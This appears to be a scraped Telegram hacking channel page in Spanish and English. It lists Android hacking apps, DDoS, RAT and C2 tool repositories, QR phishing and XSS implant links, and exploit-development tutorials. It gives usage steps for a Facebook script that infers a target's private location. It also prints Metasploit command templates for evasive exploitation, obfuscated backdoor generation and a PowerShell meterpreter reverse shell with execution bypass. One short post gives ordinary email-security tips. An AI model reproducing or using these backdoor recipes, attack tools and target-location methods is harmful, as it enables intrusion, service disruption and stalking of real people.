𝐂𝐀𝐑𝐋𝐎𝐁𝐄𝐑「𝑫𝑹𝑲」
Closed channel
Redes: http://beacons.ai/carlober Grupo : https://t.me/Carlober17numb
Show more498
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
📱Android Hacking Applications
🔹zANTI
🔗https://www.zimperium.com/zanti-mobile-penetration-testing/
🔹 Stryker
🔗 https://strykerdefence.com/
🔹 Hijacker
🔗 https://github.com/chrisk44/Hijacker
🔹Termux
🔗 https://f-droid.org/packages/com.termux/
🔹 WPSApp
🔗https://play.google.com/store/apps/details?id=com.themausoft.wpsapp
🔹WIFI WPS WPA TESTER
🔗https://play.google.com/store/apps/details?id=com.tester.wpswpatester
🔹HTTP Tools
🔗https://play.google.com/store/apps/details?id=com.cafelabs.curlme
🔹IOT Scanner
🔗https://play.google.com/store/apps/details?id=com.knabl.iotsecurityscanner
🔹Fing - Network Tools
🔗https://play.google.com/store/apps/details?id=com.overlook.android.fing
🔹Shodan
🔗https://play.google.com/store/apps/details?id=io.shodan.app
🔹PentestKit Mobile
🔗https://play.google.com/store/apps/details?id=com.pentestkit
🔹Vulners Scanner
🔗https://play.google.com/store/apps/details?id=com.vulners
🔹NetMan: Network Tools & Utils
🔗https://play.google.com/store/apps/details?id=com.eakteam.networkmanager.free
🔹nRF Connect for Mobile
🔗https://play.google.com/store/apps/details?id=no.nordicsemi.android.mcp
🔹BLE Sniffer
🔗https://play.google.com/store/apps/details?id=com.aconno.blesniffer
🔹Dorks - Hack
🔗https://play.google.com/store/apps/details?id=com.iam.googledork
🔹Intercepter - NG
🔗 http://sniff.su/
🔹 Sniffer Wicap
🔗https://play.google.com/store/apps/details?id=com.evbadroid.wicapdemo
🔹Rucky
🔗https://store.nethunter.com/packages/com.mayank.rucky/
🔹 WHID Injector
🔗https://store.nethunter.com/en/packages/whid.usb.injector/
🔹WiGLE WiFi Wardriving
🔗https://play.google.com/store/apps/details?id=net.wigle.wigleandroid
🔹Arkhota
🔗https://github.com/ALW1EZ/Arkhota
CÓMO LOS HACKERS DESCIFRAN LAS CONTRASEÑAS GUARDADAS DEL NAVEGADOR
💻 ¿ES SEGURO GUARDAR LAS CONTRASEÑAS EN EL NAVEGADOR?💻
🔸 DESCRIPCIÓN DE CONTRASEÑA QUE SE MUESTRA EN ESTE VIDEO🔸
Robo en cajeros automáticos mediante tarjeta contactless
https://blog.segu-info.com.ar/2024/05/robo-en-cajeros-automaticos-mediante.html
20 DDOS Tools
https://github.com/secgang/ddos-http?search=1
https://github.com/secgang/ddosutils
https://github.com/HyukIsBack/KARMA-DDoS
https://github.com/hoaan1995/ZxCDDoS
https://github.com/screetsec/TheFatRat
https://github.com/grafov/hulk/blob/master/hulk.py
https://github.com/jseidl/GoldenEye
https://github.com/palahsu/DDoS-Ripper
https://github.com/Tmpertor/Raven-Storm
https://github.com/Thibault-69/RAT-Hodin-v2.9
https://github.com/the0cp/awesome-ddos-tools
https://github.com/Xart3mis/AKILT
https://github.com/Leeon123/Aoyama
https://github.com/us-nexus-hackers/US-DDOS-V2
https://github.com/Hex1629/SOCKETPIE_DOSTOOL
https://github.com/pavel-odintsov/fastnetmon
https://github.com/epsylon/ufonet
https://github.com/SuperIlu/DOjS
https://github.com/BC-SECURITY/Empire
https://github.com/Ne0nd0g/merlin
🔒 Blinda tu email
Medidas fundamentales para dormir tranquilo:
1️⃣ Contraseñas: Para una buena contraseña y distinta para cada servicio necesitarás un buen gestor como puede ser: ProtonPass | Bitwarden | KeepassXC
2️⃣ 2FA: La siguiente capa de seguridad si tu contraseña llega a ser comprometida, las mejores aplicaciones serían: Aegis | 2FAS
3️⃣Proveedor del servicio: Todo esto debe ser respaldado por un correo que cuide tu privacidad: ProtonMail | TutaMail
4️⃣Proxy-email: Esto va a permitir que no tengas que entregar tu correo real y puedas crear un correo intermediario y desechable pero lo puedas ver todo en la bandeja de entrada: SimpleLogin | Addy
5️⃣ Filtración: Puedes revisar si tu correo ha sido filtrado y junto a que información en páginas como HaveIBeenPwned
¿Cuántas de estas medidas aplicas en tu día a día?
¿Y a tu alrededor cuántas personas?
https://x.com/StarkPrivacy/status/1793294485390024867
Ubicación de Facebook OSINT
Recupere la ubicación privada de Facebook de alguien, utilizando su información pública.
¿Qué hace?
Si el lugar donde alguien vive no es público en su cuenta de Facebook, este programa adivinará que le dio la cuenta de Facebook pública de los objetivos.
¿Como funciona?
Inicie sesión en el sitio móvil de Facebooks.
Obtenga los enlaces a cada foto pública
Obtenga los nombres de usuario de todos a los que les gustó una foto
Obtenga las ciudades públicas y las ciudades actuales de cada usuario del paso 3
Devuelve la ciudad / ciudad que se encontró más
¿Cómo usarlo?
Comando: python get_location.py username_of_target dueño@facebook.mail FacebookPassword
Obtenga el nombre de usuario del objetivo: vaya a su cuenta y mire la URL. La URL debería verse algo así: https://www.facebook.com/user.name?parameters=1 El nombre de usuario es el nombre de usuario
¿Por qué necesito dar mis credenciales de Facebook?
La información pública en Facebook solo está disponible para las personas que han iniciado sesión. Por lo tanto, para obtener la información pública se necesita una cuenta. Verifique el código, sus credenciales solo se usan para iniciar sesión en Facebook.
ADVERTENCIA: Este programa puede generar una advertencia de inicio de sesión.
Requisitos
Solicitud de biblioteca para Python
No es la API de Facebook de Python, esta es un raspador que obtiene toda la información del sitio de Facebook móvil.🦠🛜🏴☠️🥷
https://github.com/joren485/Facebook-Location-OSINT
Evil QR - Phishing With QR Codes
Evil QR is a spin-off of a QRLJacking attack, demonstrating how attackers could take over accounts by convincing users to scan supplied QR codes, through phishing.
https://breakdev.org/evilqr-phishing/
OSINT: Script to find Instagram profiles by name and e-mail/phone.
https://github.com/0x0be/yesitsme
JS-Tap - JavaScript Pago y soporte del software para ser utilizado como XSS Pago cargaje o post explotación Implante para monitorear a los usuarios mientras usan la aplicación dirigida https://github.com/hoodoer/JS-Tap
¿Qué es el eSIM swapping?
https://blog.elhacker.net/2024/04/que-es-el-esim-swapping.html
El SIM swapping permite a los criminales secuestrar
números de teléfono. La evolución tecnológica que representan las eSIM
no las deja fuera del alcance de los ciberdelincuentes, que se adaptaron
para clonarlas también.
Desarrollo de Exploits
https://0xninjacyclone.github.io/posts/exploitdev_1_intro/
https://0xninjacyclone.github.io/posts/exploitdev_2_stack/
https://0xninjacyclone.github.io/posts/exploitdev_3_heap/
https://0xninjacyclone.github.io/posts/exploitdev_4_binfiles/
https://0xninjacyclone.github.io/posts/exploitdev_5_winpe/
https://0xninjacyclone.github.io/posts/exploitdev_6_elf/
https://0xninjacyclone.github.io/posts/exploitdev_7_strfmt/
https://0xninjacyclone.github.io/posts/exploitdev_8_bor/
Explotación de vulnerabilidades con múltiples capas de evasión: use exploit/
set RHOSTS
set PAYLOAD
set LHOST
set LPORT
set CHOST
set GROOMSIZE 100
set DisablePayloadHandler true
set DisableNops true
set EnableContextEncoding true
set DisablePayloadHandler true
set Proxies socks4://:
exploit -j -z --------------------------------------------------------------------------------------- Creación de backdoors con payloads ofuscados y encriptados: use payload/
set LHOST
set LPORT
set PrependMigrate true
set EXITFUNC thread
set Encoder
set Encrypt true
generate -t -f /ruta/de/backdoor -e -o
-------------------------------------------------------------------------------------------- Explotación de vulnerabilidades con payloads cifrados y firmados digitalmente: use exploit/
set RHOSTS
set PAYLOAD
set LHOST
set LPORT
set SSL true
set DisablePayloadHandler true
set ForceExploit true
exploit -j -z
-------------------------------------------------------------------------------------------- Creación de backdoors con payloads camuflados y empaquetados: use payload/
set LHOST
set LPORT
set PrependMigrate true
set EXITFUNC thread
set PrependMigrate true
set PrependFork true
set PrependSetuid true
set PrependSetreuid true
set PrependSetresuid true
set PrependSetgid true
set PrependSetregid true
generate -t -f /ruta/de/backdoor -x /ruta/de/extra.dat -k -o
--------------------------------------------------------------------------------------------Explotación de vulnerabilidades con payloads de PowerShell ofuscados y con múltiples capas de evasión: use exploit/
set RHOSTS
set PAYLOAD windows/meterpreter/powershell_reverse_tcp
set LHOST
set LPORT
set Powershell::EncodeHeaders true
set Powershell::Obfuscate true
set Powershell::NoProfile true
set Powershell::SingleExecution true
set Powershell::ExecutionBypass true
set Powershell::Migrate true
exploit -j -z
🏴☠️🥷🦠🦠🦠🦠🦠☢️⛔️☢️☢️🦠⛔️☢️🦠⛔️☢️⛔️☢️⛔️☢️⛔️🦠⛔️☢️🦠☢️🦠☢️⛔️
📘 Useful cheat sheets for pentesters and information security specialists.
• Cheat sheets are an excellent assistant when working with certain software or systems. With their help, you can improve your skills in a certain area and reduce the time it takes to complete tasks to get the desired result.
• MITM cheatsheet.
• Active Directory Attack.md
• Active Directory penetration testing cheatsheet.
• Cloud - AWS Pentest.md
• Cloud - Azure Pentest.md
• Cobalt Strike - Cheatsheet.md
• Linux - Persistence.md
• Linux - Privilege Escalation.md
• Metasploit - Cheatsheet.md
• Methodology and enumeration.md
• Network Pivoting Techniques.md
• Network Discovery.md
• Reverse Shell Cheatsheet.md
• Subdomains Enumeration.md
• Windows - Download and Execute.md
• Windows - Mimikatz.md
• Windows - Persistence.md
• Windows - Post Exploitation Koadic.md
• Windows - Privilege Escalation.md
• Windows - Using credentials.md
• Best of Python Pentest Cheatsheet.
• Msfvenom Cheatsheet: Windows Exploitation.
• Best of OSCP Cheatsheet.
• Red Teaming and Social-Engineering CheatSheet.
• OSI Model Cheatsheet.
• Best of Red Teaming and Blue Teaming Cheatsheet.
• Best of iOS Forensics Cheatsheet.
• Best of Android Forensics Cheatsheet.
• Best of Digital Forensics Cheatsheet.
• Port Forwarding & Tunnelling Cheatsheet.
🐈⬛ Hoja de trucos del comando netcat.
• NetCat es una utilidad UNIX que le permite establecer conexiones TCP y UDP, recibir datos de allí y transmitirlo.La utilidad es una verdadera navaja suiza del ejército para pentestres y especialistas en seguridad de la información, con la que podemos hacer lo siguiente:
- escanear puertos;
- Puertos hacia adelante;
- recolectar pancartas de servicio;
- Escuche el puerto (BIND para la conexión inversa);
- Descargar y cargar archivos;
- Salida de contenido HTTP sin procesar;
- Crea un mini chat.
• En general, con la ayuda de NetCat, puede reemplazar algunas de las utilidades de UNIX, por lo que esta herramienta puede considerarse una especie de combinación para realizar ciertas tareas.
